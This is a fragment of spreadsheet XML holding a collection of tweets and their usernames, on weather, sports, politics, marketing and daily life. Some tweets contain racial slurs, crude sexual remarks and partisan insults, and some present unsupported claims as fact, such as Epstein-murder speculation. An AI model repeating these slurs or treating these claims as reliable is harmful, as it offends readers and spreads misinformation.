    <t>It’s so mother fucking hot in Texas right now that our power grids can’t handle anything—so we have to turn our electricity off and wallow in our sweaty clothes. 😫</t>
  </si>
  <si>
    <t>jp360solutions</t>
  </si>
  <si>
    <t>12 Employee Wellness Initiatives That Work, According To Entrepreneurs https://t.co/LNql7jhBMc https://t.co/Ona7sYhODc</t>
  </si>
  <si>
    <t>NickPRochford</t>
  </si>
  <si>
    <t>@Hambo1980 @Marbar24604616 Stokes better. I saw 81 (on tv as an 14 year old). Stokes perfect. Less of a biff. Control when needed. Aggression when needed. Umpires helped too. But amazing . And Bob Willis says Stokes better than Both 81 too.</t>
  </si>
  <si>
    <t>DonellaFarah</t>
  </si>
  <si>
    <t>Read Free Running with The Buffaloes: A Season Inside with Mark Wetmore, Adam Goucher, and the University of Colorado Men's Cross-Country Team &gt;&gt; https://t.co/FZmBJ6jQdc</t>
  </si>
  <si>
    <t>LouBuren1</t>
  </si>
  <si>
    <t>My answer to Does the absolute proof of reincarnation negate the biblical doctrine of heaven and hell? https://t.co/rAklmYiCk3</t>
  </si>
  <si>
    <t>PitOwnr</t>
  </si>
  <si>
    <t>@pilgrimroad1 @charliekirk11 "Tito Anchondo declined to describe the encounter with Trump in more detail, saying he had received death threats." Death threats. This is delusional Trump-haters' response. Fuck off. https://t.co/uHhmlyq0rj</t>
  </si>
  <si>
    <t>chiomamylova</t>
  </si>
  <si>
    <t>@khalnero can’t believe my ears, just played the song while singing these lyrics and it’s true 🤯</t>
  </si>
  <si>
    <t>CTGlo</t>
  </si>
  <si>
    <t>Seriously, these kids love debating. Which has been one of my talents since high school. It’s like if I got a summer job and they were like “think you can play with these legos for a few hours a week?” YES. Yes I can.</t>
  </si>
  <si>
    <t>mtrlofts</t>
  </si>
  <si>
    <t>New skylight about to go in today... #lofts #skylight #velux #loftconversion @ Maidstone, Kent https://t.co/ETz0zx2mSZ</t>
  </si>
  <si>
    <t>VanparysTanner</t>
  </si>
  <si>
    <t>@Austen_J_Cline @FriendOfTheYeti @Politics_Polls @Harris_X_ @ScottWRasmussen Yay you’re back! 😍😄 Acting as though undocumented people are an issue. It’s not. I’ve lived near the border, it’s literally not an issue unless you don’t like brown people for some reason.</t>
  </si>
  <si>
    <t>MathterBlaster</t>
  </si>
  <si>
    <t>Love seeing students take others under their wing. Class is much more productive and fun when they are the experts in the room. @tinkercad https://t.co/MzYUF4ZFyL</t>
  </si>
  <si>
    <t>wilke_drxwilke</t>
  </si>
  <si>
    <t>"Young lady, I happen to be an expert on humans..." mixed media #painting of Doctor John #Zoidberg from #Futurama by WILKE #cartoons #comicbooks #movies #fanart https://t.co/mboneLlGsp</t>
  </si>
  <si>
    <t>hofstra_gia</t>
  </si>
  <si>
    <t>Tomorrow evening!! We can’t wait to meet everyone https://t.co/PQUoskB2cZ</t>
  </si>
  <si>
    <t>_DrRosieJayne</t>
  </si>
  <si>
    <t>Just popped into the Christian bookshop down the road &amp; saw a lilac fluffy pen emblazoned with ‘God’s little princess’ (in glitter) for sale. I think I need to lie down for a bit.</t>
  </si>
  <si>
    <t>TylerDeniston</t>
  </si>
  <si>
    <t>https://t.co/7sazQnOBwO Written down for my story since I don't need funds or a book</t>
  </si>
  <si>
    <t>JasDrawsSmtms</t>
  </si>
  <si>
    <t>@nickjr Wait he is a detective? Neat. But still tell me why the fuck that guy has a phone</t>
  </si>
  <si>
    <t>RachelNgom</t>
  </si>
  <si>
    <t>check out my latest pin (and follow me on #pinterest) for more #entrepreneur tips: https://t.co/NO4FJs4pM9 https://t.co/vfc9Gr9urJ</t>
  </si>
  <si>
    <t>burneraccnt419</t>
  </si>
  <si>
    <t>@isoquince Still not that threatening up top, Greenwood is inexperienced, Rashford is diabolical 1 on 1 and Martial is inconsistent but I’d love him to replicate 2015 and prove me wrong.</t>
  </si>
  <si>
    <t>HarryChemay</t>
  </si>
  <si>
    <t>@supermatstar True Matt. Haven't tried Zwift but indoor trainers are a godsend in the middle of winter.</t>
  </si>
  <si>
    <t>StatusFemme</t>
  </si>
  <si>
    <t>@rockythebody While it was admirable that he turned himself into a gentleman for her, Gatsby had this unrealistic vision for him &amp; Daisy. If she couldn’t fit what he wanted he became frantic and frazzled, expecting her to behave in his ideal. Daisy did what she genuinely wanted, even confused.</t>
  </si>
  <si>
    <t>artherapycenter</t>
  </si>
  <si>
    <t>@NubivagantDays Very fishy . I think he was going to blab about people we would never dream of and THOSE people weren’t having it . How would you like to be on his legal team ? 👀🥵👀😳 #EpsteinMurder</t>
  </si>
  <si>
    <t>KirbyJaneCraft</t>
  </si>
  <si>
    <t>@cbdix @HarmlessUK @FlowerPodReach for flowers?</t>
  </si>
  <si>
    <t>Brooktini84</t>
  </si>
  <si>
    <t>@ChelsieTravis wedding is tomorrow and I’m soooooo excited!!🎉</t>
  </si>
  <si>
    <t>Blue_Bee_pllntr</t>
  </si>
  <si>
    <t>@brianklaas "Many radical Ents still oppose him for his one-time policy of “cutting down all the trees.” Saruman has acknowledged that he was wrong and says his position on Ents has evolved. "</t>
  </si>
  <si>
    <t>ICBALawyers</t>
  </si>
  <si>
    <t>We are ecstatic to have Charles Barbieri, Foster Swift Collins &amp; Smith PC, as the President of the ICBA! We are all so excited to see where your leadership takes us! https://t.co/6KNSY136bg</t>
  </si>
  <si>
    <t>divadoll123</t>
  </si>
  <si>
    <t>I just read the timeline of some dude named Reza Aslan. So much hate and he's jousting at windmills. I hope he's on a watch list for potential violence.</t>
  </si>
  <si>
    <t>ChrissyFireWat1</t>
  </si>
  <si>
    <t>@MAGA2ARIGHTS @ScottPresler Amen to that MA, a true Patriot🇺🇸</t>
  </si>
  <si>
    <t>_GemmaCurtis_</t>
  </si>
  <si>
    <t>Wishing @scott_curtis13 and all the cast of @legallyKYT the best of luck for opening night! Break legs kids and I’ll see you Friday&amp;Saturday! 🌟🌟🌟 #omigodyouguys</t>
  </si>
  <si>
    <t>iTomHarness</t>
  </si>
  <si>
    <t>🎙️NOW ON GOOGLE PLAY MUSIC🎙️ 808 Podcast w/ @BobClarkDammit - #Podcast for #B2B Tom gives you three tips on how to get your content outside your comfort zone. He also tells you why health food is so damn amazing! LISTEN IF YOU DARE: https://t.co/zPemrhDOng https://t.co/NKDqUSfuQl</t>
  </si>
  <si>
    <t>nas_xo</t>
  </si>
  <si>
    <t>@BenOyedepo @ThinTallTosin @coker_sege @nimi_xxx_ @Alex_Houseof308 @FolaMyFlower @Curtis_000 @Abeke__ @call_me_ayokay @ShahrukhKhan_FC I’ll never get to that point, Amen.</t>
  </si>
  <si>
    <t>k9studiophotog</t>
  </si>
  <si>
    <t>We are humble and over excited with this request from @TheKennelClubUK on asking us to use 2 of our participants images on their Annual Dog photography Awards to be used on thir charitable trust. Thank you #TalentoVenezolano #TalentoEspañol #Mascotas #Pets #MadeAtVanarts https://t.co/9f24OlC2ms</t>
  </si>
  <si>
    <t>morrelife</t>
  </si>
  <si>
    <t>So with this few points of mine. I hope it counter balances all the boobs talk have been tweeting about 😂😂 good night..</t>
  </si>
  <si>
    <t>WilliamNorrisJr</t>
  </si>
  <si>
    <t>@BaySideBaldie Lmao you’re probably right. I’m never gonna hear the end of this American Honey thing am I?</t>
  </si>
  <si>
    <t>beaglecruiser</t>
  </si>
  <si>
    <t>@wvjoe911 I want to live in AZ just so I can vote for @ShuttleCDRKelly!!</t>
  </si>
  <si>
    <t>CoffeeWthKenobi</t>
  </si>
  <si>
    <t>The #Barbie #StarWars line of collectible dolls from @Mattel are available for preorder now from @amazon! (Release date: 11/18/19) This homage to #ANewHope includes: •Princess Leia: https://t.co/1OPMUuFN7L •R2-D2: https://t.co/SFD8gd2SWG •Darth Vader: https://t.co/wRIEDPbO1q https://t.co/d0hoWYjPVx</t>
  </si>
  <si>
    <t>V6rzz</t>
  </si>
  <si>
    <t>@DearYugo stream u doing gfx and just chill</t>
  </si>
  <si>
    <t>martinlmnt</t>
  </si>
  <si>
    <t>@danthegrapsfan Me too. Especially the ceiling part. They could have easily had her walked through a door but the whole ceiling thing and everything else you said just worked. It was great.</t>
  </si>
  <si>
    <t>anthonytkaz</t>
  </si>
  <si>
    <t>@realDonaldTrump Blood and recession on your hands.</t>
  </si>
  <si>
    <t>lgalvarezz</t>
  </si>
  <si>
    <t>Today my sister told me she wanted to go to beauty school and man I could not be more excited for her!</t>
  </si>
  <si>
    <t>luvswooyoung</t>
  </si>
  <si>
    <t>@smwhrcelestial omg ab6ix was on my side for a good while for the ending. i have a good video of it</t>
  </si>
  <si>
    <t>stayzenss</t>
  </si>
  <si>
    <t>@BTS_wembleystad The taste jumped out</t>
  </si>
  <si>
    <t>TheShowPony</t>
  </si>
  <si>
    <t>Going to see @jessedayton perform some outlaw country Friday night at The Rhythm Room! https://t.co/tbPk2PFX6d</t>
  </si>
  <si>
    <t>alau2</t>
  </si>
  <si>
    <t>“For the longest time, I believed that only “white people” were allowed to have running water. That’s the way it was, and the way I understood it”: ⁦@ASutherland9⁩ #HuffPostPersonal https://t.co/7it4v4uJ4N</t>
  </si>
  <si>
    <t>Dodge_A_Wrench</t>
  </si>
  <si>
    <t>@SethMacFarlane I like to play the National Anthem any time I make love.</t>
  </si>
  <si>
    <t>Keylowl0w</t>
  </si>
  <si>
    <t>Im going to see Lisa on Friday 🥳 I need everything 😂😂</t>
  </si>
  <si>
    <t>Akua_AB</t>
  </si>
  <si>
    <t>@Kehlani Basit and Jonathan 🥺</t>
  </si>
  <si>
    <t>I35travel</t>
  </si>
  <si>
    <t>Waco | 4th St/5th St WB @ I-35 | Various lanes closed tonight 7PM to 6AM https://t.co/wDZzRI1rVz #My35</t>
  </si>
  <si>
    <t>IceKreamFreek</t>
  </si>
  <si>
    <t>HotelBEATDWN He beat it up &amp; nutted deep! https://t.co/6l7Ru22P6X</t>
  </si>
  <si>
    <t>MsIndependentGP</t>
  </si>
  <si>
    <t>At the Entrepre-Her Marketing Workshop you're getting my 9 years of marketing expertise, marketing agency experience, and countless hours of trial and error strategy on how to create a holistic and successful marketing campaign for your brand or business. https://t.co/hsqMOxVHBI https://t.co/1S5PCjMn6H</t>
  </si>
  <si>
    <t>alison_wood</t>
  </si>
  <si>
    <t>Hey @UPS traffic and accidents in Los Angeles are bad enough without your drivers texting while on the road! I saw 3 different drivers on my way home! #DoBetter</t>
  </si>
  <si>
    <t>peachandrabbit</t>
  </si>
  <si>
    <t>FE3H ng+ (and a better understanding of the game) has resulted in my Blue Lion squad being far more OP by chapter 12 than my Black Eagles squad... Byleth too of course</t>
  </si>
  <si>
    <t>SolidShOok</t>
  </si>
  <si>
    <t>@TheUpmind @MoistAndFrothy @MrM_TV1 @SuperSmashCon He told Ally to throw before top 8 because he didn't deserve to be playing. He was under emotional duress because of Ally's abuse, and there is no evidence of blackmail.</t>
  </si>
  <si>
    <t>chiefsfan82</t>
  </si>
  <si>
    <t>@MoyerM5 And dodgers</t>
  </si>
  <si>
    <t>PluggRadio757</t>
  </si>
  <si>
    <t>You are now listening to Various Local Artist - Indy Artist Playlist on @PluggRadio757 check us out at https://t.co/gdpQwgqr4p</t>
  </si>
  <si>
    <t>thomasgleaton</t>
  </si>
  <si>
    <t>@Mr_Lamont6 @JahmalKennedy @autumnrae43 You said Troy was for people who can’t get into Alabama or Auburn. I got into both. I chose Troy.</t>
  </si>
  <si>
    <t>123RMAGA1</t>
  </si>
  <si>
    <t>@P0A_Triot23 @Metallica @realDonaldTrump @John_F_Kennnedy @VincentCrypt46 That’s good to know, I’ve been in that airport a couple of times, and was horrified. Truly creeped out, I was an Art minor, used to contemplating art, so what you suggest, was definitely not the impression I was left with, quite the opposite.</t>
  </si>
  <si>
    <t>ESFLibrary</t>
  </si>
  <si>
    <t>Get Ready for tonight's National Night Out at East Side Freedom Library! #NNO https://t.co/sXVTldSQHt https://t.co/86hjupYDFP</t>
  </si>
  <si>
    <t>NWSFortWorth</t>
  </si>
  <si>
    <t>Friday will be another hot and humid day for North and Central Texas. Scattered showers and thunderstorms will be possible for parts of North Texas this afternoon. Most will not see rain, but be sure to stay weather-aware for your afternoon commute. Happy Friday! 🥳🌦️ #txwx https://t.co/GyzVNiv88x</t>
  </si>
  <si>
    <t>votetrump202045</t>
  </si>
  <si>
    <t>@ChrisJZullo @realDonaldTrump Go to YouTube and Google Obama saying that today's economy could never happen again. Now that Trump created it that socialist wants credit.. typical n</t>
  </si>
  <si>
    <t>SteffenFinch</t>
  </si>
  <si>
    <t>The Artistic Achievements of Native Americans Through the Ages https://t.co/CPCbjAM6AK https://t.co/J2e7xPK4cm</t>
  </si>
  <si>
    <t>ManorHouseIlk</t>
  </si>
  <si>
    <t>This weekend is you last chance to visit the 50 years of the Dales Way Exhibition at the Manor House – a must for any keen walkers. FREE Admission Open Saturday &amp; Sunday 11am-4pm</t>
  </si>
  <si>
    <t>KibibiSalia</t>
  </si>
  <si>
    <t>Bruh Sam always had feelings for Danny since season 1</t>
  </si>
  <si>
    <t>karenamyatt</t>
  </si>
  <si>
    <t>@LeaRavagePfau @TomJChicago @lotsofuss @UROCKlive1 I noticed at the Greenville rally he pointed his index finger at his right temple, like a gun motion. He did it twice, within about 20 seconds. He was talking about AOC when he did it. It was one of those moments with him where you don't quite believe it. Others caught it.</t>
  </si>
  <si>
    <t>Org_Marsha</t>
  </si>
  <si>
    <t>Nap was way too satisfying I know for sure I’m be up all night</t>
  </si>
  <si>
    <t>TypedNormal</t>
  </si>
  <si>
    <t>@JamilaWehner Or just the Russians</t>
  </si>
  <si>
    <t>marie_d3</t>
  </si>
  <si>
    <t>@tv_KevinSharkey @JP_Biz @bbcradioulster @BBCRadioFoyle This is a ridiculous decision! @_seancoyle is brilliant and that show makes people happy.</t>
  </si>
  <si>
    <t>GrahamO77447126</t>
  </si>
  <si>
    <t>People that continue make excuses for Donald Trump and lie for Donald Trump, need to be brought to justice just as he would be.</t>
  </si>
  <si>
    <t>AbbyMeldrum</t>
  </si>
  <si>
    <t>one person followed me and one person unfollowed me // automatically checked by https://t.co/F6EwtobM3u</t>
  </si>
  <si>
    <t>EnzoCaine</t>
  </si>
  <si>
    <t>I’m tired of folks lying to me like i don’t know the truth</t>
  </si>
  <si>
    <t>lmeloncon</t>
  </si>
  <si>
    <t>@ColleenDerkatch @arichardson_phi us too, Colleen. Which meant we are still in academic "compliance" but can now help our instructors (and grad students) understand they can use their own language to help create equitable spaces and show support for students.</t>
  </si>
  <si>
    <t>anthonysquinn</t>
  </si>
  <si>
    <t>@salilp21 @es3_28 @marc_raimondi @arielhelwani @espnmma ...as for ‘earning respect of the fans’ get out of here. He is set for life as far as respect goes w his accomplishments, accolades and overcoming adversity. He does what he wants. He’s not losing fans and he’s certainly not losing money. The champ champ does what he wants. Gg</t>
  </si>
  <si>
    <t>crystalneysha</t>
  </si>
  <si>
    <t>Alexa..... tell these niggas to get off my dick</t>
  </si>
  <si>
    <t>tmj_INK_HRTA</t>
  </si>
  <si>
    <t>Check out the 213 latest openings at BJ's Restaurants, Inc. (@workatbjs), Spectrum Retirement Communities (@SpectrumCommLLC), Hawthorn Senior Living (@HawthornRet), and more.</t>
  </si>
  <si>
    <t>ohmygodestiny</t>
  </si>
  <si>
    <t>@ffleischwolff he’s the best</t>
  </si>
  <si>
    <t>brittanyadesso</t>
  </si>
  <si>
    <t>@HazelMonforton Why don’t you make biscuits with the excess Or pizza dough</t>
  </si>
  <si>
    <t>Blackboxx2020</t>
  </si>
  <si>
    <t>@K_JeanPierre @MSNBC @NicolleDWallace Trump is like an arsonist who started a fired and watches it burn basking in the grief of others. This demon derives pleasure from being cruel and inflicting misery. If this is not the mark of the beast, what is? Who's worse, him or those who suck the devil's dick?</t>
  </si>
  <si>
    <t>BrianBarton85</t>
  </si>
  <si>
    <t>@tlfordsc @JohnKasich @donlemon @jimsciutto @CNN Sorry. I have to watch paint dry. https://t.co/PiIyXJ0mZZ</t>
  </si>
  <si>
    <t>Mawufeasi</t>
  </si>
  <si>
    <t>@RikVerwaest @WouterAvet @FranckenTheo The people of West Europe are already submitted on their knees and so used to it they don’t even know different. Thinking that you’re fine living a life at the hands of government. Submissive, cowardly and scared. And fooling themselves it’s normal.</t>
  </si>
  <si>
    <t>GBur28840301</t>
  </si>
  <si>
    <t>@BernieSanders Climate change is a code name for redistribution of wealth. Socialism is a code name for redistribution of wealth to the socialists leaders pockets.</t>
  </si>
  <si>
    <t>haley_crist</t>
  </si>
  <si>
    <t>I hate when people complain that their kid will only wear certain brands of clothes and that it’s expense. Like I’m sorry that you made your kid that way.</t>
  </si>
  <si>
    <t>CollegeInvestin</t>
  </si>
  <si>
    <t>@Stifoo It’s all about goals And desires. If you have something you want to achieve, you gotta work for it. But you also “don’t have to”, but I also don’t think it gives you the right to troll/complain if you refuse to take action.</t>
  </si>
  <si>
    <t>AndresKasie</t>
  </si>
  <si>
    <t>Get Access Santería Enthroned: Art, Ritual, and Innovation in an Afro-Cuban Religion (Routledge Revivals) =&gt; https://t.co/3hFrQpMV2v</t>
  </si>
  <si>
    <t>Bluurox</t>
  </si>
  <si>
    <t>Got to present some of my work (including the stuff just published in @JMedChem!) at @AbbVieUS north of Chicago this week, which was super cool. But maybe even cooler was getting to share with my family in Illinois (none of whom are chemists) including my Grampy, afterwards 💕🥰 https://t.co/rnMECwMN3I</t>
  </si>
  <si>
    <t>IamCoachDaniel</t>
  </si>
  <si>
    <t>@AirManiEleven I played with people this summer who played with great spatial awareness and didn’t over dribble. Going back to bad basketball with people I don’t know is tough is all I’m saying</t>
  </si>
  <si>
    <t>pete28231</t>
  </si>
  <si>
    <t>@Samiknowsbest1 @ResistsPotus @Maltomash @ivyjofreeman @DenverMikeGlass @hwmnylx @Keeli_K @AVE_rockies @Esmia62 @PeaceHappyJoy @lifeandtime @KlimpCarolyn @myimmortalgirl1 @Darren5tevens @KathleenClance3 @BrendaBalazs @RosannaPhillip @michelle_spenc @deenice0228 @rjdunfee @Lillia8 @kim4Design @cinnamitch @CTyroneD @thea_ishii @huladiablo @MjaneMarshall Amen to that❤️❤️❤️</t>
  </si>
  <si>
    <t>fosterxkid</t>
  </si>
  <si>
    <t>my last day off was the 27th my next day off is the 10th 🙃</t>
  </si>
  <si>
    <t>ozzyslovegirl</t>
  </si>
  <si>
    <t>@girlsreallyrule Picture is over 4 years old! That #boycottjimmyjohns hashtag has also been around here and FB for at least 4 years too!</t>
  </si>
  <si>
    <t>Brananward</t>
  </si>
  <si>
    <t>First Coast Home Services! Best in the business. https://t.co/UcijIhzCXp</t>
  </si>
  <si>
    <t>realblackconrad</t>
  </si>
  <si>
    <t>@IlhanMN He is a juvenile He's not smart enough to do better</t>
  </si>
  <si>
    <t>molliemotiv8</t>
  </si>
  <si>
    <t>Sundays Eggi Oats . . Wana make your 50g of oats feel like 100g then scroll down to find out how ⬇️ . Dont forget to hit the save button ✅ . Total calories 450 Carbs 40g Fats 6g protein 57g . Ingredients⬇️ 🔸️50g… https://t.co/21mJvmR9CI</t>
  </si>
  <si>
    <t>stevoc331</t>
  </si>
  <si>
    <t>@2008Philz We have $12M tied up in robertson lol.</t>
  </si>
  <si>
    <t>fuckfeelungs</t>
  </si>
  <si>
    <t>Maybe I'm just not Good enough and nobody wants the chance to get to know me and maybe be more</t>
  </si>
  <si>
    <t>GreggyH</t>
  </si>
  <si>
    <t>Play calling is so bad. No urgency either. UNI is flat out the better team</t>
  </si>
  <si>
    <t>willfire27</t>
  </si>
  <si>
    <t>Ok, can everyone stop saying he died by suicide and let’s agree that he was found hanged? I know the leftist media is spinning this madly, but a little bit of journalistic integrity has to come from somewhere.</t>
  </si>
  <si>
    <t>Daoxingames</t>
  </si>
  <si>
    <t>At least my boss enjoys and likes my dark sense of humor. Lol Sometime co-workers but mostly as my boss enjoy my dark humor and always wants to hear one.</t>
  </si>
  <si>
    <t>lanakulik</t>
  </si>
  <si>
    <t>@seanhannity @DonaldJTrumpJr The left simply doesn't care. This masterpiece will end up just like his sister's book at the Dollar Store for 50 cent/copy.</t>
  </si>
  <si>
    <t>BackwardsHatTV</t>
  </si>
  <si>
    <t>@FitzDavenport @UberDerp @Warcraft How much did you pay to be in those private servers? Free is a big reason</t>
  </si>
  <si>
    <t>_iCautionYou</t>
  </si>
  <si>
    <t>Paintttt the skyyy red for youuuuu ❤️👊🏾</t>
  </si>
  <si>
    <t>sccountyjobs</t>
  </si>
  <si>
    <t>Recruiting PLANNER II, III &amp; IV - Conduct planning studies and analyses and review land use development applications. Apply https://t.co/y2tIhWi912 https://t.co/dM3ZPSK4le</t>
  </si>
  <si>
    <t>TedJones48</t>
  </si>
  <si>
    <t>@Wes_fan @KamalaHarris My point exactly... how many Local/State/Fed level jails have you been boohooing outside of , decrying the separation of families at? Go on, we know the answer .. it's ok .. ZERO. Cry your crocodile tears elsewhere .. no one is buying it</t>
  </si>
  <si>
    <t>emmanuelYOUTHmn</t>
  </si>
  <si>
    <t>One of our favorite weekends of the year is coming up 10/17 - 10/19! MINNESOTA YOUTH CONVENTION! Sign ups are live! Hope to see you there :) https://t.co/q3hVQKphKq https://t.co/599NpPlykA</t>
  </si>
  <si>
    <t>mkebucks34</t>
  </si>
  <si>
    <t>@Seauxmali Siakam coming to Milwaukee?</t>
  </si>
  <si>
    <t>tommyjets</t>
  </si>
  <si>
    <t>@PSLToFlushing You think he comes up on 9/1?</t>
  </si>
  <si>
    <t>reshkay_</t>
  </si>
  <si>
    <t>I’ve been trying to befriend my friends mum for years now. She sounds soo cool.</t>
  </si>
  <si>
    <t>theautomatski</t>
  </si>
  <si>
    <t>The Real Stark Industries https://t.co/lqGie2AkCZ | #ICOs #detroit #tucson #losangels #bitcoinrussia #dallas #newyork #louiesville #charlotte #stratis #platform #brazil #bitcoinaustralia #ITOs #ethereum #sanFransico #saintpaul #cybersecurity #ethereum #madison #milwaukee #deals https://t.co/QDNcjIrbPs</t>
  </si>
  <si>
    <t>benmonnett</t>
  </si>
  <si>
    <t>“The history of American education includes a graveyard of good ideas condemned by pressure for fast results.” As many start back their school year this week, remember your “why.” No test score will accurately measure the total impact you can have on a student!</t>
  </si>
  <si>
    <t>bxxdthingsmila</t>
  </si>
  <si>
    <t>@ntltcxyuh @AriUpdateEurope no they already have it cause i went brum yesterday and got it</t>
  </si>
  <si>
    <t>rashanismoist</t>
  </si>
  <si>
    <t>@usaqidrop Lmfao yo how you get hacked on your own platform? Mannn I feel for him</t>
  </si>
  <si>
    <t>reggieroyal02</t>
  </si>
  <si>
    <t>I literally got more clients for personal training same day I fractured my toe. And I tore tendons</t>
  </si>
  <si>
    <t>justsayes</t>
  </si>
  <si>
    <t>Sean Hannity: My Sources are Telling Me the DOJ Investigation of Spygate “Will Shock the Conscience of a Nation” (VIDEO)https://t.co/sp1bYBWSFk via @gatewaypundit</t>
  </si>
  <si>
    <t>Gustaharo</t>
  </si>
  <si>
    <t>@jabroni_mike Posterizing people and committing hard fouls😂</t>
  </si>
  <si>
    <t>TheHandyman61</t>
  </si>
  <si>
    <t>Social services brainwashed kids into thinking they were abused, sold them to foster parents https://t.co/g8M4MZkwe4</t>
  </si>
  <si>
    <t>freakinguseless</t>
  </si>
  <si>
    <t>@Iesbeon as long as they give creative control to people like jon watts who were influential on the first two films and keep the same supporting cast -- ned, mj, may, flash. this is fine! give me good movies and i'm fine!</t>
  </si>
  <si>
    <t>Chanceman14</t>
  </si>
  <si>
    <t>I know her parents won’t approve me, cause she way too sheltered and I’m too free</t>
  </si>
  <si>
    <t>CarterMutt</t>
  </si>
  <si>
    <t>@SharkyPadded I really do hope you continue on the subject matter in some form, though. It'd suck if this initial reaction discouraged you entirely.</t>
  </si>
  <si>
    <t>AnchorAudio</t>
  </si>
  <si>
    <t>Summer, sun and good sound. Set up the MegaVox just about anywhere for clear voice amplification. Additional savings on select MegaVox packages for the remainder of the month! #AnchorinAction https://t.co/ao9wSQClpF https://t.co/rYpPAcHMIy</t>
  </si>
  <si>
    <t>eatcookwrite</t>
  </si>
  <si>
    <t>@LMcLachlan60 @wapaDB @Tav_assoli Another example of a democratic, decommodifying intervention: https://t.co/MK0eOBjym5 Farm Land Trust to keep farmers on the land.</t>
  </si>
  <si>
    <t>CarlosBrabante</t>
  </si>
  <si>
    <t>@jaye3000 @LaughsJay @morrigansarcher Read between the lines. He sayed people of color aren't real Americans and need to go back to Africa or Mexico or Siam or wherever. He never told no white people to go back to Prussia, did he? And liberals are incapable of platitudes-</t>
  </si>
  <si>
    <t>Judge_Garry</t>
  </si>
  <si>
    <t>I'm so happy that my Kitties have adjusted to the #Vagabond lifestyle. Eva,my 13 yr old. who came from the horse farm I lived at, spends most of the day as Jungle Kitty outdoors, she doesn't stray too far from... https://t.co/tno6rlfFfe</t>
  </si>
  <si>
    <t>franceswolf</t>
  </si>
  <si>
    <t>@pjraven @torinicole1127 I wanna be part of the family😀</t>
  </si>
  <si>
    <t>Newbs28</t>
  </si>
  <si>
    <t>@Bacoose WAKE UP</t>
  </si>
  <si>
    <t>jennmalinchalk</t>
  </si>
  <si>
    <t>And here we've come to yet another (almost) week in which the 'person' in the White House has committed various impeachable offenses out in broad daylight for all the world to see. We're ending with the Speaker of the House AGAIN refusing to do her job and breaking her oath. Fun</t>
  </si>
  <si>
    <t>daveschroeder</t>
  </si>
  <si>
    <t>Analysis | The Daily 202: Police officers keep getting shot by people with criminal records who are not allowed to own guns https://t.co/Z2P9iQKgbj</t>
  </si>
  <si>
    <t>JerryTravone</t>
  </si>
  <si>
    <t>@Henryhahadavis @realDonaldTrump I bet if @realDonaldTrump saw this he would love for you to perform .</t>
  </si>
  <si>
    <t>methyllife</t>
  </si>
  <si>
    <t>IT’S TIME TO START FEELING AMAZING! Accept our email invitation and get $10 towards your first purchase of Methyl-Life. #mthfr #mthfrawareness #mthfrgenemutation #health #vitamins #journeytohealth #educateyourself #knowledgeispower #methylation #mood #wellness #methylfolate https://t.co/X77iS4Dxup</t>
  </si>
  <si>
    <t>TennisDaMenace2</t>
  </si>
  <si>
    <t>@GenderXYZ @STPeach @tomaspotatas The grammatical errors sort of backed it up 😅</t>
  </si>
  <si>
    <t>Rob64_IV</t>
  </si>
  <si>
    <t>@SterellaKiwi @MysticRevive Least you got 1k, us male niggas need to grind https://t.co/72hS1HUT0Q</t>
  </si>
  <si>
    <t>VeteranRadio</t>
  </si>
  <si>
    <t>#NowPlaying Smokin in the Boys room.mp3 by Brownsville Station https://t.co/Br34DLG1vV https://t.co/SAz3Hm1fA5 LeeBird</t>
  </si>
  <si>
    <t>chipotlepepper</t>
  </si>
  <si>
    <t>@Cramshananteen @kittentexana @yashar The term started being used in the '90s; and there's nuance to it, re: who it applies to and also native american specific use. I first heard of it related to cultural appropriation and did some research. Its wikipedia page is a good start. https://t.co/5iDgHBCvl7</t>
  </si>
  <si>
    <t>WinstonMitche20</t>
  </si>
  <si>
    <t>@drawandstrike @EyesOnQ Well, stupid got him pretty far in the FBI...</t>
  </si>
  <si>
    <t>bapruger77</t>
  </si>
  <si>
    <t>@TheOfficerTatum The million dollar question.</t>
  </si>
  <si>
    <t>CaliSlim12</t>
  </si>
  <si>
    <t>@SausyCaesar You never gonna get an answer. I personally believe Joseph the best jojo but the fandom does hate Joseph a lot</t>
  </si>
  <si>
    <t>gramfurn</t>
  </si>
  <si>
    <t>Ann's dream child (literally), and Arlene! #ClawsTNT</t>
  </si>
  <si>
    <t>_bradstarr</t>
  </si>
  <si>
    <t>Quick hike up before the sunset 🌅 https://t.co/M7PxS7D7rP</t>
  </si>
  <si>
    <t>ITS_ONLYWHIT</t>
  </si>
  <si>
    <t>Any food that requires mayonnaise I don’t want it if it’s Miracle whip, Nope keep it . And I barely eat mayo</t>
  </si>
  <si>
    <t>Cleometime333</t>
  </si>
  <si>
    <t>@loeffler_josh @OntLiberal @fordnation Yea josh and guess who pays for it that was the problem with the liberals it wasnt free it just means your children may one day be paying that debt does that make you feel good</t>
  </si>
  <si>
    <t>xRisingYT</t>
  </si>
  <si>
    <t>@UREDCRAH Streaming soon request songs !sr and the name if song lol</t>
  </si>
  <si>
    <t>oompf_astarte</t>
  </si>
  <si>
    <t>He didn’t want me to wear this crop top kayaaaa sya nag suot hehe U so cute andro https://t.co/YzfO23gGIE</t>
  </si>
  <si>
    <t>alyssamarrie</t>
  </si>
  <si>
    <t>it’s lowkey so funny how I can’t make decisions by myself anymore and I have to count on my internet friends to make them for me lol</t>
  </si>
  <si>
    <t>JimCollinsTA</t>
  </si>
  <si>
    <t>@wjxt4GM @wjxt4 Kyle Brady was first rate. A class act and spot on insightful</t>
  </si>
  <si>
    <t>rivercitycasino</t>
  </si>
  <si>
    <t>Guess what day it is? 🐪 It's three days before @ThunderVegas takes the stage at River City! 😍 Enjoy an amazing show Saturday, August 10. Get your tickets here: https://t.co/PRZKeKvr5l https://t.co/Eu9siaoKe9</t>
  </si>
  <si>
    <t>eastbury_hotel</t>
  </si>
  <si>
    <t>Guest feedback for our Executive Chef, Matthew Street “top 3 tasting menu we have had in 20 years - an asset to the hotel - a experienced and passionate Chef”.@SherborneTIC @VisitSherborne @sherbornecastle @DiscoverSherbs @Abbey_104 @crosskeyssherb @Trenchermans @Tasteofthewest</t>
  </si>
  <si>
    <t>MrsGonzalesPreK</t>
  </si>
  <si>
    <t>Thank you @LEFforLISD #LEFGrants! We are looking forward to our motor lab!!! https://t.co/8Kwps2FvD7</t>
  </si>
  <si>
    <t>MrDash109</t>
  </si>
  <si>
    <t>Canadians ALWAYS get poorer when a Conservative govt is in power. Brian Mulroney quadrupled the debt and Stephen Harper added $160 BILLION new debt during their times in office; both grew debt faster than the economy; the tide was reversed only after @liberal_party was elected.</t>
  </si>
  <si>
    <t>ThistleTrust</t>
  </si>
  <si>
